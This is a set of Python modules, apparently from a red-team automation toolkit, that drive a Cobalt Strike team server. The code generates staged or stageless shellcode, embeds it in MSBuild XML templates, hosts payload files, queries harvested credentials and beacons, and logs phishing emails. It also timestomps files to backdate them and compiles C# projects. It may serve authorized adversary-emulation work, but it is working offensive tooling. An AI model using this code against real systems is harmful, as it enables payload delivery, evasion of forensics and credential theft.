#!/usr/local/bin/python3

# This tool will take an an artifact from commandline and grab IoC information such as exif and hashes and print them

# It can also be imported like a library to be used by other tools. 
# If used as a library, the items won't be printed to the console, as this is done in the Main function

from magicfile import from_file
import hashlib

# For now, I am using subprocess to run exiftool, which I installed through Brew. 
# Might eventually look into other python libraries for this

import subprocess
import sys
from os.path import exists
from pepy import parse

# These shouldn't change that much, but possibly will from system to system. If so, set them here:
exifToolPath = '/usr/local/bin/exiftool'
touchPath = '/usr/bin/touch'
stringsPath = '/usr/bin/strings'

########### EXIF #############
def getFileType(file):
	return from_file(file, mime=True)


def getExif(file):
	# We check the file type and see if we have pre-built some flags for that specific file type (i.e. Exe)
	filetype = getFileType(file)
	#print(filetype)
	exifOutput = None

	if filetype == 'application/x-dosexec':
		exifOutput = getExifEXE(file)
	elif filetype == 'application/pdf':
		# I still need to figure out what's relevant on a PDF, for now, you just get the basic exif.
		exifOutput = getExifOther(file)
	elif filetype == 'text/plain':
		# It's a plaintext file so all it would show is the date
		pass
	else:
		exifOutput = getExifOther(file)
		
	return exifOutput

def getExifEXE(file, flags = ["-productname", "-productversion", "-assemblyversion", "-comments", "-companyname", "-filedescription", "-fileversionnumber", "-productversionnumber", "-filemodifydate", "-fileaccessdate", "-fileinodechangedate"]):
	# Useful information for an EXE file
	
	exifData = subprocess.run([exifToolPath] + flags + [file], capture_output=True)
	return exifData.stdout.decode()

def getExifOther(file):
	# Run it without limiting with flags
	exifData = subprocess.run([exifToolPath] + [file], capture_output=True)
	return exifData.stdout.decode()

def timestomp(file, timestamp="201512180130.09"):
	# touch -a -m -t $timestompdate $exepathPersist
	touchflags = ["-a", "-m", "-t"]
	result = subprocess.run([touchPath] + touchflags + [timestamp] + [file], capture_output=True)

	# Let's double check that our timestomp worked
	exifdateflags = ["-filemodifydate", "-fileaccessdate",  "-fileinodechangedate"]
	exifData = subprocess.run([exifToolPath] + exifdateflags + [file], capture_output=True)
	return exifData.stdout.decode()

######## Hashes ########

# returns a list of the hashes in the order of the hashtypes
def getHashes(file, hashtypes=['md5', 'sha1', 'sha256']) -> list:
	hashlist = list()
	for hashtype in hashtypes:
		try:
			hasher = hashlib.new(hashtype)
			with open(file, 'rb') as afile:
				buf = afile.read()
				hasher.update(buf)
			hashlist.append(hasher.hexdigest())
		except:
			print("Issue hashing, maybe you provided an incorrect hashtype")
			hashlist.append(None)

	return hashlist


def getOutputType(filename: str) -> str:
	"""Gets the .NET Output Type of this file (either Library, Exe, or WinExe).

	Args:
		filename (str): The path to the filename to get the output path for.

	Returns:
		str: The .NET output type.
	"""
	if exists(filename):
		parsed = parse(filename)
		if parsed.characteristics > 0x2000:
			return "Library"
		elif parsed.subsystem == 3:
			return "Exe"
		elif parsed.subsystem == 2:
			return "WinExe"


def getPDB(filename: str) -> str:
	"""Analyzes the binary to extract the PDB file.

	Args:
		filename (str): The filename to extract the PDB string from.

	Returns:
		str: The PDB string if found.
	"""
	if exists(filename):
		result = subprocess.run([stringsPath] + [filename], capture_output=True)
		output = result.stdout.decode()
		if '.pdb' in output:
			lines = output.split('\n')
			for line in lines:
				if '.pdb' in line:
					return line

##### Main ########

def parseArguments():
	parser = ArgumentParser()

	parser.add_argument("-t", "--timestomp", help="a datetime to stomp the file to, example \"201512180130.09\"")
	parser.add_argument("file", help="the file to check")

	args = parser.parse_args()
	return args


def main():
	pass

if __name__ == '__main__':
	# There are some imports which aren't used when this is a library, so they are imported here instead
	from argparse import ArgumentParser
	main()



#!/usr/local/bin/python3

# The idea for this tool and some code came from redshell: https://github.com/Verizon/redshell

# This tool will connect to a cobalt strike team server to perform various tasks such as payload generation, hosting files, and other fun tasks

# It can also be imported like a library to be used by other tools. 
# If used as a library, the items won't be printed to the console, as this is done in the Main function

import pexpect
import getpass
from os import path
from os.path import abspath
from re import findall, DOTALL, VERBOSE, escape, compile, MULTILINE
import base64
# I really need to do better with pexpect to avoid the hardcoded sleeps
# This is a temp fix that will probably make it into production
from time import sleep
import sys
from collections import defaultdict
from payload_automation.sleepy import wrap_command, deserialize, convert_to_oneline
from enum import Enum

class ArtifactType(Enum):
	DLL = "dll"
	EXE = "exe"
	POWERSHELL = "powershell"
	PYTHON = "python"
	RAW = "raw"
	SVCEXE = "svcexe"
	VBSCRIPT = "vbscript"


### Start CSConnector Class ###
class CSConnector:
	def __init__(self, cs_host, cs_user=None, cs_pass=None, cs_directory="./", cs_port=50050):
		self.cs_host = cs_host

		# We have a server but are missing a key piece of info
		# Let's see if it's in the agprop file
		if not cs_user or not cs_pass or not cs_port:
			agproperties = self.parse_aggressor_properties()
			
			# If our host isn't an ip address/domain name check if it is the alias name
			if self.cs_host not in agproperties.keys():
				# Loop every ip address and its connection information
				for ip, connection in agproperties.items():
					# Get alias for this server
					alias = connection.get('alias')
					if alias == cs_host:
						# If we found the alias, change cs_host from alias to ip address
						self.cs_host = ip
						break

			if self.cs_host in agproperties.keys():
				cs_user = agproperties[self.cs_host]["user"]
				cs_port = agproperties[self.cs_host]["port"]
				cs_pass = agproperties[self.cs_host]["password"]

		self.cs_user = cs_user + "_striker"
		if not cs_pass:
			self.cs_pass = getpass.getpass("Enter Cobalt Strike password: ")
		else:
			self.cs_pass = cs_pass
		self.cs_port = cs_port
		self.cs_directory = cs_directory
		# NOTE: This is known to work for CS 4.0 and 4.1. This may change in future versions. Possibly look into leveraging CS's agg script (not included on Mac OS systems)
		self.aggscriptcmd = "java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -classpath '{}/cobaltstrike.jar' aggressor.headless.Start".format(self.cs_directory)
		# This gets populated once the connect function is run (in the future, maybe run that function in the initialization?)
		self.cs_process = None

	def __enter__(self) -> 'CSConnector':
		"""The __enter__ method is invoked at the beginning of a 'with' statement.

		Use this in the syntax of with CSConnecter(...) as cs:

		Returns:
			CSConnector: The newly constructed CSConnector obejct.
		"""		
		self.connectTeamserver()
		return self

	def __exit__(self, type, value, tb):
		"""The __exit__ method is invoked at the end of a 'with' block.

		Use this in the syntax of with CSConnector(...) as cs:
		"""		
		self.disconnectTeamserver()

	##### Payload Generation #######
	# This section is for functions that leverage Cobalt Strike's native as well as custom CNA scripts to generate various payloads

	def generateMSBuild(
		self, 
		agscriptPath: str, 
		listener: str, 
		outputPath: str = './', 
		staged: bool = False, 
		x64: bool = True
	):
		"""Generates an MSBuild payload. The file's name will be staged/stageless_64/32.xml depending on the staging 
		and architecture of the generated payload.

		Args:
			agscriptPath (str): The absolute path to the OSASAggressorScripts directory
			listener (str): The listener to generate a payload for.
			outputPath (str, optional): The path to place the outtpued file at. Defaults to './'.
			staged (bool, optional): Generate a staged or stageless payload. Defaults to False.
			x64 (bool, optional): Generate an x64 or x86 payload. Defaults to True.
		"""
		shellcode = self.generateShellcode(listener, staged=staged, x64=x64)
		if shellcode:
			encoded = base64.b64encode(shellcode)
			if x64:
				arch = "64"
			else:
				arch = "32"

			if staged:
				filename = 'staged'
			else:
				filename = 'stageless'

			templateFile = f'Helpers/msBuild/artifact_{arch}.xml'
			templatePath = path.join(agscriptPath, templateFile)
			filename = path.join(outputPath, f'{filename}_{arch}.xml')

			with open(templatePath, 'rt') as read_file:
				data = read_file.read()

			data = data.replace('%%DATA%%', encoded.decode())

			with open(filename, 'wt') as write_file:
				write_file.write(data)

	def generateShellcode(self, listener: str,  staged: bool = False, x64: bool = True) -> bytes:
		"""Generates raw shellcode and returns it.

		Args:
			listener (str): The listener to generate shellcode for.
			staged (bool, optional): Generate a staged or stageless payload. Defaults to False.
			x64 (bool, optional): Generate an x64 or x86 payload. Defaults to True.

		Returns:
			bytes: The raw shellcode bytes.
		"""		
		return self.generatePayload(listener, ArtifactType.RAW, staged=staged, x64=x64)

	def generatePayload(
		self, 
		listener: str, 
		artifact_type: 'ArtifactType', 
		staged: bool = False, 
		x64: bool = True
	) -> bytes:
		"""Geneartes a Cobalt Strike payload and returns the bytes.

		Args:
			listener (str): The listener to generate the payload for.
			artifact_type (ArtifactType): What type of payload to generate.
			staged (bool, optional): Generate a staged or stageless payload. Defaults to False.
			x64 (bool, optional): Generate an x64 or x86 payload. Defaults to True.

		Returns:
			bytes: The payload bytes.
		"""
		if x64:
			arch = "x64"
		else:
			arch = "x86"

		if staged:
			function = "artifact_stager"
		else:
			function = "artifact_payload"

		cmd = f"return base64_encode({function}('{listener}', '{artifact_type.value}', '{arch}'))"
		encoded_bytes = self.ag_get_object(cmd, timeout=30000)
		# We converted the bytes to b64 for transferring, so now convert them back
		return base64.b64decode(encoded_bytes)

	##### Payload/File Hosting ########
	# This section is for functions for hosting and taking down files using Cobalt Strike's Sites functionality

	# Returns the full URL as a string
	def hostFile(
		self, 
		file_path: str, 
		site: str = None, 
		port: int = 80, 
		uri: str = '/hosted.txt', 
		mime_type: str = 'text/plain', 
		description: str = 'Autohosted File', 
		use_ssl: bool = False,
    	sleep_time: int = 2
	) -> str:
		"""Hosts a file

		Args:
			file_path (str): [description]
			site (str, optional): [description]. Defaults to None.
			port (int, optional): [description]. Defaults to 80.
			uri (str, optional): [description]. Defaults to '/hosted.txt'.
			mime_type (str, optional): [description]. Defaults to 'text/plain'.
			description (str, optional): [description]. Defaults to 'Autohosted File'.
			use_ssl (bool, optional): [description]. Defaults to False.

		Returns:
			str: The URL of the hosted file
		"""		
		# If no site is provided, we can grab the local IP, but we need to not wrap it in quotes
		if not site:
			# Could also use the normal sendline with 'x localip()'
			site = self.get_local_ip()
			if site:
				# Wrap in double quotes to make it a Sleep string
				site = f"\"{site}\""
			else:
				site = "localip()"
		else:
		# Since we aren't wrapping in doublequotes in the command due to the possible usage of a function, we need to do it here
			site="\"{}\"".format(site)

		sites = self.get_sites()
		for a_site in sites:
			site_type = a_site.get('Type')
			if site_type == 'page':
				site_host = a_site.get('Host')
				if f"\"{site_host}\"" == site:
					site_uri = a_site.get('URI')
					if site_uri == uri:
						self.killHostedFile(port=port, uri=uri)

		if use_ssl:
			link = "https://{}:{}{}".format(site.strip('\"'), port, uri)
		else:
			link = "http://{}:{}{}".format(site.strip('\"'), port, uri)

		if use_ssl:
			use_ssl = "true"
		else:
			use_ssl = "false"

		if file_path[0] != '/':
			# Wrap in single quotes
			file_path = abspath(file_path)
			
		file_path = f"'{file_path}'"

		multiline = f"""
		$handle = openf({file_path});
		$content = readb($handle, -1);
		closef($handle);
		site_host({site}, {port}, "{uri}", $content, "{mime_type}", "{description}", {use_ssl});
		"""
		# a sleep is necessary here so the headless client has enough time to upload the file
		self.ag_sendline_multiline(multiline, sleep_time=sleep_time)
		return link
	
	def killHostedFile(self, port: int = 80, uri: str = '/hosted.txt'):		
		cmd = f'site_kill({port}, "{uri}")'
		self.ag_sendline(cmd, sleep_time=1)

	##### Log Item to Teamserver ######
	# This section is for functions that allow you to write information to the teamserver which will show up in the activity log
	def logToEventLog(self, string, event_type=None):
		if event_type == "ioc":
			header = "Indicator of Compromise"
		elif event_type == "external":
			header = "External Action Taken"
		else:
			header = "Striker String Log"
		
		cmd = f'elog("{header}: {string}")'
		self.ag_sendline(cmd, sleep_time=1)

	def logEmail(self, 
				email_to, 
				email_from, 
				email_sender_ip, 
				email_subject, 
				iocs: dict = None ):

	# NOTE: IOCs looked terrible in Activity Report. Change this so that each IoC is sent individually
		
		# Let's build the basic string, then add the iocs
		elog_string = "Phishing email sent:\\nSending IP: {}\\nTo: {}\\nFrom: {}\\nSubject: {}\\n".format(email_sender_ip, email_to, email_from, email_subject)

		if iocs:
			# Let's add a section for IoCs related specifically to the sent email (attachments, links, etc.)
			ioc_string = "Email IoCs: \\n"
			for ioc_name in iocs.keys():
				ioc_string = ioc_string + "- {}: {}\\n".format(ioc_name, iocs[ioc_name])
			elog_string = elog_string + ioc_string
		self.ag_sendline('elog("{}")'.format(elog_string), sleep_time=1)


	def taskBeacon(self, bid, string, attack_id=None):
		# AttackID is the MITRE ATT&CK Technique ID, if applicable
		self.ag_sendline('btask({}, "{}", "{}")'.format(bid, string, attack_id), sleep_time=1)

	def logToBeaconLog(self, bid, string):
		cmd = f'blog({bid}, "{string}")'
		self.ag_sendline(cmd, sleep_time=1)

	def logToBeaconLogAlt(self, bid, string):
		cmd = f'blog2({bid}, "{string}")'
		self.ag_sendline(cmd, sleep_time=1)

	def getEmailLogs(self):
		#e foreach $index => $entry (archives()) { if ( "Phishing email sent:*" iswm $entry["data"] ) { println("$entry['data']")}; }
		multiline = """
		@email_logs = @();
		foreach $entry (archives()) {
			if ("Phishing email sent:*" iswm $entry["data"]) {
				add(@email_logs, $entry['data']);
			}
		}
		return @email_logs;
		"""
		return self.ag_get_object_multiline(multiline)

	def getEmailIoCs(self):
		#e foreach $index => $entry (archives()) { if ( "IoC:*" iswm $entry["data"] ) { println("$entry['data'] at " .dstamp($entry['when']))}; }

		# Should start with "Email Indicator of Compromise: [name] - [data]"?
		multiline = """
		@email_iocs = @();
		foreach $entry (archives()) {
			if ("Email Indicator of Compromise:*" iswm $entry["data"]) {
				add(@email_iocs, "$entry['data'] at " . dstamp($entry['when']));
			}
		}
		return @email_iocs;
		"""
		return self.ag_get_object_multiline(multiline)

	def getIoCs(self):
		#e foreach $index => $entry (archives()) { if ( "IoC:*" iswm $entry["data"] ) { println("$entry['data'] at " .dstamp($entry['when']))}; }
		multiline = """
		@iocs = @();
		foreach $entry (archives()) {
			if ("*Indicator of Compromise:*" iswm $entry["data"]) {
				add(@iocs, "$entry['data'] at " . dstamp($entry['when']));
			}
		}
		return @iocs;
		"""
		return self.ag_get_object_multiline(multiline)

	def getExternalActions(self):
		multiline = """
		@external_actions = @();
		foreach $entry (archives()) {
			if ("External Action Taken:*" iswm $entry["data"]) {
				add(@external_actions, "$entry['data'] at " . dstamp($entry['when']));
			}
		}
		return @external_actions;
		"""
		return self.ag_get_object_multiline(multiline)
	

	def getStringLogs(self):
		multiline = """
		@string_logs = @();
		foreach $entry (archives()) {
			if ("Striker String Log:*" iswm $entry["data"]) {
				add(@string_logs, "$entry['data'] at " . dstamp($entry['when']));
			}
		}
		return @string_logs;
		"""
		return self.ag_get_object_multiline(multiline)

	##### Helper Functions #####
	# This section is for helper functions used throughout the rest of the script 
	# such as grabbing useful information from the team server like the names of listeners running

	def get_local_ip(self) -> str:
		command = "return localip()"
		return self.ag_get_object(command)

	# Contribution by @JoeVest from his version of our code
	# Previously we just had get_listeners(self):. CS changed their model which made this not always work, and better to have a listeners_local and listeners_stageless
	# TODO: Investigate the listeners() api call and determine if we still need a function for it, or if we should make a get_listeners(self) function again that merges the lists to get every possible listener
	def get_listeners_local(self):
		command = "return listeners_local()"
		return self.ag_get_object(command)

	# Contribution by @JoeVest from his version of our code
	def get_listeners_stageless(self) -> list:
		command = "return listeners_stageless()"
		return self.ag_get_object(command)

	# Contribution by @JoeVest from his version of our code
	def get_listener_info(self,name) -> list:
		command = f'return listener_info("{name}")'
		return self.ag_get_object(command)

	def get_beacons(self) -> list:
		command = "return beacons()"
		return self.ag_get_object(command)

	# Contribution by @JoeVest from his version of our code
	def get_beaconlog(self) -> list:
		command = 'return data_query("beaconlog")'
		return self.ag_get_object(command)

	def get_users(self) -> list:
		command = "return users()"
		return self.ag_get_object(command)

	def get_credentials(self) -> list:
		command = "return credentials()"
		return self.ag_get_object(command)

	def get_hosts(self) -> list:
		command = "return hosts()"
		return self.ag_get_object(command)

	def get_sites(self) -> list:
		command = "return sites()"
		return self.ag_get_object(command)

	def get_targets(self) -> list:
		command = "return targets()"
		return self.ag_get_object(command)

	

	def connectTeamserver(self):
		"""Connect to CS team server"""

		# In my testing, I found that there were issues sending too many 
		# messages to event log over one connection ( => ~7), so I recommend
		# creating a new object every so often or disconnecting and reconnecting.
		# This issue needs to be troubleshot (troubleshooted?) in the future

		if not path.exists("{}{}".format(self.cs_directory, "/cobaltstrike.jar")):
			# Might want to exit rather than return. TBD.
			raise Exception("Error: Cobalt Strike JAR file not found")

		# prompt user for team server password
		#
		command = "{} {} {} {} {}".format(self.aggscriptcmd,
										self.cs_host,
										self.cs_port,
										self.cs_user,
										self.cs_pass)
		#print(command)
		# spawn agscript process
		self.cs_process = pexpect.spawn("{} {} {} {} {}".format(self.aggscriptcmd,
																			self.cs_host,
																			self.cs_port,
																			self.cs_user,
																			self.cs_pass))

		
		# check if process is alive
		if not self.cs_process.isalive():
			raise Exception("Error connecting to CS team server! Check config and try again.")

		
		# Expect the aggressor prompt which means we initialized correctly
		try:
			self.cs_process.expect(r'\x1b\[4maggressor\x1b\[0m>', timeout=5)
			self.send_ready_command()
		except (pexpect.exceptions.TIMEOUT, pexpect.exceptions.EOF):
			print(self.cs_process.before.decode())
			raise Exception("EOF encountered") from None

		#self.poutput("Connecting...")

		# upon successful connection, display status
		#self.do_status('')

	def send_ready_command(self):
		# We want to wait for the server to be fully synchronized, so we use Cobalt Strike's "on ready {}" event handler 
		cmd = 'on ready { println("Successfully" . " connected to teamserver!"); }'
		expect = '.*Successfully connected to teamserver!.*'
		self.ag_get_string(cmd, expect=expect)

	def disconnectTeamserver(self):
		"""Disconnect from CS team server"""

		# close the agscript process
		if self.cs_process:
			self.cs_process.close()
		else:
			print("CS was already disconnected! Hopefully you already knew this.")

		# clear config vars
		#self.socks_port = ''
		#self.beacon_pid = ''
		#self.bid = ''
		#self.socks_port_connected = False


	# Thank you to @JoeVest for finding a solution to the Headless Aggressor adding /script/ to the path with getFileProper()
	def ag_load_script(self, script_path):
		cmd = f"include(getFileProper('{script_path}')"
		self.ag_sendline(cmd)

	# Contribution by @JoeVest from his version of our code
	# TODO: It should be possible to return this as a list rather than a string. Look into this later.
	def ag_ls_scripts(self) -> str:
		cmd = 'return ls'
		self.ag_sendline(cmd)

	def ag_sendline(self, cmd, script_console_command='e', sleep_time: int = 0):
		full_cmd = "{} {};".format(script_console_command, cmd)
		self.cs_process.sendline(full_cmd)
		sleep(sleep_time)
		return full_cmd

	def ag_sendline_multiline(self, multiline: str, script_console_command: str = 'e', sleep_time: int = 0):
		oneline = convert_to_oneline(multiline)
		return self.ag_sendline(oneline, script_console_command=script_console_command, sleep_time=sleep_time)

	def ag_get_string_multiline(self, multiline: str, script_console_command: str = 'e', expect: str = r'\r\n\x1b\[4maggressor\x1b\[0m>', timeout: int = -1, sleep_time: int = 0) -> str:
		oneline = convert_to_oneline(multiline)
		return self.ag_get_string(oneline, script_console_command=script_console_command, expect=expect, timeout=timeout, sleep_time=sleep_time)

	def ag_get_string(self, cmd: str, script_console_command: str = 'e', expect: str = r'\r\n\x1b\[4maggressor\x1b\[0m>', timeout: int = -1, sleep_time: int = 0) -> str:
		full_cmd = self.ag_sendline(cmd, script_console_command=script_console_command, sleep_time=sleep_time)

		self.cs_process.expect(escape(full_cmd), timeout=timeout)
		self.cs_process.expect(expect, timeout=timeout)

		before = self.cs_process.before.decode()
		return before

	def ag_get_object_multiline(self, multiline: str, script_console_command: str = 'e', expect: str = r'\r\n\x1b\[4maggressor\x1b\[0m>', timeout: int = -1, sleep_time: int = 0):
		oneline = convert_to_oneline(multiline)
		return self.ag_get_object(oneline, script_console_command=script_console_command, expect=expect, timeout=timeout, sleep_time=sleep_time)

	def ag_get_object(self, cmd: str, script_console_command: str = 'e', expect: str = r'\r\n\x1b\[4maggressor\x1b\[0m>', timeout: int = -1, sleep_time: int = 0) -> str:
		wrapped = wrap_command(cmd)
		match = self.ag_get_string(wrapped, script_console_command=script_console_command, expect=expect, timeout=timeout, sleep_time=sleep_time)
		base64_regex = r"^(?:[A-Za-z0-9+\/]{4})*(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{4})$"
		parse = findall(base64_regex, match, MULTILINE)
		if parse:
			return deserialize(parse[0])
		else:
			raise Exception(f"Base64 regex found no match on {match[:50]}") from None

	# Returns a dict with the server IP/hostname as key and 
	# the values being a dict with keys for user, password, port
	def parse_aggressor_properties(self, aggprop=None):
		connections = defaultdict(dict)

		if not aggprop:
			# We weren't given a path to the agressor.prop file, so let's assume it's in the home dir (default for CS)
			homedir = path.expanduser("~")
			aggprop= f"{homedir}/.aggressor.prop"

		# One challenge is that the connection properties aren't necessarily in order
		with open(aggprop, "r") as file:
			for line in file.readlines():
				# Find all the connection lines and pluck out the info we need
				if "connection.profiles." in line:
					# A list of regexes with the 'key' hardcoded to better extract values
					regexes = [
						r"connection\.profiles\.(.*?)\.user=(.*)",
						r"connection\.profiles\.(.*?)\.password=(.*)",
						r"connection\.profiles\.(.*?)\.port=(.*)",
						r"connection\.profiles\.(.*?)\.alias=(.*)",
					]

					# The keys for the server dict, order must be the same as the regexes
					keys = [
						"user",
						"password",
						"port",
						"alias"
					]

					# iterate through both regexes and keys at the same tie
					for regex, key in zip(regexes, keys):
						# try to match based off of the regex
						matches = findall(regex, line)
						if matches:
							# if we get a match, values are stored as [(ip, value)]
							match = matches[0]
							ip, value = match
							# get the value of key ip
							# connections is a default dict of factory dict so if connections[ip] does not exist it will automatically create a dict
							connection = connections[ip]
							connection[key] = value
			
		return connections


### End CSConnector Class ###


##### Main ########

def parseArguments():
	parser = ArgumentParser()

	parser.add_argument("-t", "--teamserver", help="the hostname or IP address of the teamserver", required=True)
	parser.add_argument("-u", "--user", help="the user to connect to the teamserver as (_striker will be added)", default=environ.get('USER'))
	# TODO: Make this requirement optional and if not provided, secure prompt for password
	parser.add_argument("-p", "--password", help="the password for the teamserver, if not provided, you will be prompted", default=None)
	parser.add_argument("-P", "--port", help="the port for the teamserver, default is 50050", default=50050)
	parser.add_argument("-j", "--javadir", help="the path to the directory containing the Cobalt Strike JAR file", default="./")

	args = parser.parse_args()
	return args


def main():
	args = parseArguments()

	with CSConnector(
		args.teamserver, 
		cs_user=args.user,
		cs_pass=args.password,
		cs_directory=args.javadir,
		cs_port=args.port
	) as cs:
		pass

if __name__ == '__main__':
	# There are some imports which aren't used when this is a library, so they are imported here instead
	from argparse import ArgumentParser
	from os import environ
	main()



#!/usr/local/bin/python3

# This tool will take an an artifact from commandline and grab IoC information such as exif and hashes and print them

# It can also be imported like a library to be used by other tools. 
# If used as a library, the items won't be printed to the console, as this is done in the Main function

import subprocess
import sys
from os.path import isdir, join, exists, splitext
from os import listdir
from re import findall, MULTILINE
from pathlib import PurePath
from xml.etree import ElementTree
from collections import defaultdict

# These shouldn't change that much, but possibly will from system to system. If so, set them here:
msbuildPath = '/usr/local/bin/msbuild'
cscPath = '/usr/local/bin/csc'


##### Compiler Functions #####

def msbuildCSharp(file, platform="x64", config="Release", target="Rebuild"):
	flags = [file, "/t:{}".format(target), "/p:Configuration={},Platform={}".format(config, platform)]
	output = subprocess.run([msbuildPath] + flags, capture_output=True)
	return output.stdout.decode()


def cscCSharp(file, platform="x64", target="winexe"):
	flags = [file, "/t:{}".format(target), "/platform:{}".format(platform)]
	output = subprocess.run([cscPath] + flags, capture_output=True)
	return output.stdout.decode()

########## Dynamic Functions ##########

def _dynamicallyDetermine(
	identifier: str, 
	func_name: str, 
	directory_id: str = 'Directory', 
	sln_id: str = 'Sln', 
	csproj_id: str = 'CsProj'
):
	"""A private function that is used to dynamically determine which corresponding function run based off of whether 
	the input is a directory, a solution file, or a csproj file.

	Args:
		identifier (str): The input which identifies a directory, sln file, or csproj file.
		func_name (str): The function name to dynamically find the three corresponding functions from.
		directory_id (str, optional): The ID to add to the func_name to find the directory function. 
			Defaults to 'Directory'.
		sln_id (str, optional): The ID to add to the func_name to find the solution function. Defaults to 'Sln'.
		csproj_id (str, optional): The ID to add to the func_name to find the csproj function. Defaults to 'CsProj'.

	Returns:
		Any: The result from the dynamically invoked function.
	"""
	directory_func = file_locals.get(func_name + directory_id)
	sln_func = file_locals.get(func_name + sln_id)
	csproj_func = file_locals.get(func_name + csproj_id)

	# If is directory
	if isdir(identifier):
		if directory_func:
			return directory_func(identifier)
		else:
			print(f"[-] Directory Function: {func_name + directory_id} not found.")
	
	_, extension = splitext(identifier)
	# If is .sln
	if extension == '.sln':
		if sln_func:
			return sln_func(identifier)
		else:
			print(f"[-] Solution Function: {func_name + sln_id} not found.")

	# If is .csproj
	elif extension == '.csproj':
		if csproj_func:
			return csproj_func(identifier)
		else:
			print(f"[-] CsProj Function: {func_name + csproj_id} not found.")

def _dynamicDirectory(directory: str, func_name: str, sln_id: str = 'Sln') -> list:
	"""Dynamically invokes a function for parsing a directory for a sln file.

	Args:
		directory (str): The directory containing a sln file.
		func_name (str): The function name to run the solution function on.
		sln_id (str, optional): The ID to append to the function name to find the solution function. Defaults to 'Sln'.

	Returns:
		list: A list of all the results from every solution file.
	"""
	results = list()
	sln_func = file_locals.get(func_name + sln_id)
	if sln_func:
		sln_files = parseDirectory(directory)
		for sln_file in sln_files:
			results += sln_func(sln_file)

	return results


def _dynamicSln(sln_file: str, func_name: str, csproj_id: str = 'CsProj') -> list:
	"""Dynamically invokes a function for parsing a sln file.

	Args:
		sln_file (str): The solution file to parse.
		func_name (str): The name of the function to dynamically run.
		csproj_id (str, optional): The ID to append to the function name to find the csproj function. Defaults to 'CsProj'.

	Returns:
		list: A list of all the results from every csproj file in this sln file.
	"""
	results = list()
	csproj_func = file_locals.get(func_name + csproj_id)
	if csproj_func:
		csproj_files = parseSln(sln_file)
		for csproj_file in csproj_files:
			result = csproj_func(csproj_file)
			results.append(result)

	return results

########## Helper Functions ##########

def getCsProjTags(csproj_file: str, tag: str):
	"""Gets a list of tags from a csproj file

	Args:
		csproj_file (str): The file to extract tags from.
		tag (str): The tags to search the csproj file for.

	Returns:
		Iterator: Iterator of element tree objects
	"""
	try:
		tree = ElementTree.parse(csproj_file)
		root = tree.getroot()
		# All tags have a header in front of them for whatever reason so we need to add that
		tagHeader = root.tag.replace('Project', '')
		realTag = tagHeader + tag
		return root.iter(realTag)
	except FileNotFoundError:
		# Return empty generator
		return iter(())


def parseDirectory(directory: str) -> list:
	"""Parse a directory and return the paths of all .sln files.

	Args:
		directory (str): The directory to parse.

	Returns:
		list: The list of parsed out sln files.
	"""
	paths = list()
	if isdir(directory):
		files = listdir(directory)
		for file in files:
			if '.sln' in file:
				full_path = join(directory, file)
				paths.append(full_path)

	return paths


def parseSln(sln_file: str) -> list:
	"""Parse a solution file for all csproj files.

	Args:
		sln_file (str): The path to the sln file.

	Returns:
		list: The list of parsed csproj files.
	"""
	# Parse sln file for csproj
	projs = list()
	try:
		with open(sln_file, 'rt') as read_file:
			contents = read_file.read()

		csproj_regex = r'^Project\("{.*?}"\) = ".*?", "(.*?)", "{.*?}"$'
		matches = findall(csproj_regex, contents, MULTILINE)
		if matches:
			pure_path = PurePath(sln_file)
			# Remove the filename to get the path
			pure_parent = PurePath(*pure_path.parts[:-1])
			parent = str(pure_parent)

			for match in matches:
				if '.csproj' in match:
					# Sln file uses backslash, we need to convert this to regular slash
					replaced = match.replace('\\', '/')
					full_path = join(parent, replaced)
					projs.append(full_path)
	except FileNotFoundError:
		pass

	return projs


def parseConfiguration(condition: str) -> tuple:
	"""Extract the config and platform from the condition string.

	Args:
		condition (str): The string from the csproj file.

	Returns:
		tuple: The config and the platform.
	"""
	condition = condition.strip()
	config_platform_regex = r"^\'\$\(Configuration\)\|\$\(Platform\)' == '(.*?)\|(.*?)'$"
	matches = findall(config_platform_regex, condition, MULTILINE)
	if matches:
		for match in matches:
			config, platform = match
			return config, platform

	return tuple()


def extractConfigPlatform(the_dict: dict, config: str, platform: str) -> str:
	"""Extracts information for a config and platform from a dictionary.

	Args:
		the_dict (dict): The dict to parse information from.
		config (str): The config to fetch from the dict.
		platform (str): The platform to fetch from the dict.

	Returns:
		str: The found information.
	"""
	this_config = the_dict.get(config)
	if this_config:
		return this_config.get(platform)

########## CsProj Functions ##########

def getOutputNameCsProj(csproj_file: str) -> str:
	"""Get the output exe/dll name.

	Args:
		csproj_file (str): The path to the csproj file.

	Returns:
		str: The output exe/dll name.
	"""
	outputType = getOutputTypeCsProj(csproj_file)
	names = getCsProjTags(csproj_file, "AssemblyName")
	for name in names:
		output = name.text
		if outputType == 'Exe' or outputType == 'WinExe':
			output += '.exe'
		elif outputType == 'Library':
			output += '.dll'

		return output


def getOutputTypeCsProj(csproj_file: str) -> str:
	"""Gets the output type (Exe, WinExe, or Library) of the project.

	Args:
		csproj_file (str): The path to the csproj file.

	Returns:
		str: The output type.
	"""
	outputTypes = getCsProjTags(csproj_file, "OutputType")
	for outputType in outputTypes:
		return outputType.text


def getDebugTypeCsProj(csproj_file: str) -> dict:
	"""The debug type (what debug information is included in the exe).

	Args:
		csproj_file (str): The path to the csproj file.

	Returns:
		dict: A dict containing a dict mapping the config and platform with the debug type used.
	"""
	configuration_platform_debug_dict = defaultdict(dict)
	try:
		tree = ElementTree.parse(csproj_file)
		root = tree.getroot()
		tagHeader = root.tag.replace('Project', '')
		propertyGroupTag = tagHeader + 'PropertyGroup'
		propertyGroups = tree.findall(propertyGroupTag)
		for propertyGroup in propertyGroups:
			condition = propertyGroup.attrib.get('Condition')
			if condition:
				config, platform = parseConfiguration(condition)
				debugTypeTag = tagHeader + 'DebugType'
				debugTypes = propertyGroup.findall(debugTypeTag)
				for debugType in debugTypes:
					platform_debug_dict = configuration_platform_debug_dict[config]
					platform_debug_dict[platform] = debugType.text
		return dict(configuration_platform_debug_dict)

	except FileNotFoundError:
		return dict()


def getConfigurationsCsProj(csproj_file: str) -> dict:
	"""Gets the configuration options from the csproj file.

	Args:
		csproj_file (str): The path to the csproj file.

	Returns:
		dict: A dict containing the available config and platform obtions.
	"""
	configurations = getCsProjTags(csproj_file, "PropertyGroup")
	config_platforms = defaultdict(set)
	for config in configurations:
		condition = config.attrib.get('Condition')
		if condition:
			config, platform = parseConfiguration(condition)
			if config and platform:
				config_set = config_platforms[config]
				config_set.add(platform)
	
	return dict(config_platforms)

########## General Functions ##########

